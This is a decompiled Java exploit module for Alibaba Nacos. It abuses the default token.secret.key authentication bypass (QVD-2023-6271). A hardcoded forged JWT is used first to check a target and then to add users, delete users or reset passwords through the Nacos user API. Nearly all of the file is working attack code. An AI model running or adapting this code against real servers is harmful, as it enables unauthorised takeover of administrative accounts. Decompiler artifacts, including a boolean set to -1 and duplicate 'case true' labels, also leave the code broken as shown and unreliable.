package com.alibaba.nacos.exploit;

import ch.qos.logback.core.joran.util.beans.BeanUtil;
import com.alibaba.nacos.entity.ExecutionResult;
import com.alibaba.nacos.entity.Vulnerability;
import com.alibaba.nacos.httpclient.MyHttpRequests;
import com.alibaba.nacos.httpclient.MyHttpResponse;
import com.github.kevinsawicki.http.HttpRequest;
import java.util.HashMap;
import org.apache.tomcat.util.http.fileupload.FileUploadBase;

/* loaded from: input_file:com/alibaba/nacos/exploit/Alibaba_Nacos_default_token_idor.class */
public class Alibaba_Nacos_default_token_idor implements Vulnerability {
    final String VulName = "Nacos token.secret.key默认配置(QVD-2023-6271)";

    @Override // com.alibaba.nacos.entity.Vulnerability
    public String getInfo() {
        getClass();
        return String.format("漏洞名称: %s\n\n漏洞描述: %s\n\n漏洞影响版本: %s\n\n漏洞修复方案: %s\n\n参考链接: %s\n\n", "Nacos token.secret.key默认配置(QVD-2023-6271)", "开源服务管理平台 Nacos 中存在身份认证绕过漏洞，在默认配置下未对 token.secret.key 进行修改，导致远程攻击者可以绕过密钥认证进入后台，造成系统受控等后果。", "0.1.0 <= Nacos <= 2.2.0", "将application.properties文件中token.secret.key默认值进行更改", "");
    }

    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult check(String str) throws Exception {
        String str2 = (str.endsWith("/") ? str.substring(0, str.length() - 1) : str) + "/v1/auth/users/login";
        HashMap hashMap = new HashMap();
        hashMap.put("Authorization", "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q");
        try {
            MyHttpResponse sendRequest = new MyHttpRequests().sendRequest(str2, "POST", "username=nacos&password=nacos", hashMap, true);
            if (sendRequest.getResponseBody().contains("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q")) {
                getClass();
                return new ExecutionResult(true, "Nacos token.secret.key默认配置(QVD-2023-6271)", sendRequest.getResponseBody(), null);
            }
            getClass();
            return new ExecutionResult(false, "Nacos token.secret.key默认配置(QVD-2023-6271)", null, null);
        } catch (Exception e) {
            getClass();
            return new ExecutionResult(false, "Nacos token.secret.key默认配置(QVD-2023-6271)", null, null);
        }
    }

    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult exploit(String str, String... strArr) throws Exception {
        String[] split = strArr[0].split(" ");
        String str2 = split[1];
        String str3 = (str.endsWith("/") ? str.substring(0, str.length() - 1) : str) + "/v1/auth/users";
        HashMap hashMap = new HashMap();
        hashMap.put("Authorization", "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q");
        hashMap.put(FileUploadBase.CONTENT_TYPE, "application/x-www-form-urlencoded");
        MyHttpRequests myHttpRequests = new MyHttpRequests();
        try {
            boolean z = -1;
            switch (str2.hashCode()) {
                case 96417:
                    if (str2.equals(BeanUtil.PREFIX_ADDER)) {
                        z = false;
                        break;
                    }
                    break;
                case 99339:
                    if (str2.equals("del")) {
                        z = true;
                        break;
                    }
                    break;
                case 108404047:
                    if (str2.equals("reset")) {
                        z = 2;
                        break;
                    }
                    break;
            }
            switch (z) {
                case false:
                    MyHttpResponse sendRequest = myHttpRequests.sendRequest(str3, "POST", split[0], hashMap, true);
                    if (sendRequest.getResponseBody().contains("create user ok!") || sendRequest.getResponseBody().contains("already exist!")) {
                        return new ExecutionResult(true, "新增用户成功", sendRequest.getResponseBody(), null);
                    }
                    break;
                case true:
                    MyHttpResponse sendRequest2 = myHttpRequests.sendRequest(str3, HttpRequest.METHOD_DELETE, split[0], hashMap, true);
                    if (sendRequest2.getResponseBody().contains("delete user ok!")) {
                        return new ExecutionResult(true, "删除用户成功", sendRequest2.getResponseBody(), null);
                    }
                    break;
                case true:
                    MyHttpResponse sendRequest3 = myHttpRequests.sendRequest(str3, HttpRequest.METHOD_PUT, split[0], hashMap, true);
                    if (sendRequest3.getResponseBody().contains("update user ok!") || sendRequest3.getResponseBody().contains("not exist!;")) {
                        return new ExecutionResult(true, "重置密码成功", sendRequest3.getResponseBody(), null);
                    }
                    break;
            }
            getClass();
            return new ExecutionResult(false, "Nacos token.secret.key默认配置(QVD-2023-6271)", null, null);
        } catch (Exception e) {
            getClass();
            return new ExecutionResult(false, "Nacos token.secret.key默认配置(QVD-2023-6271)", null, null);
        }
    }
}
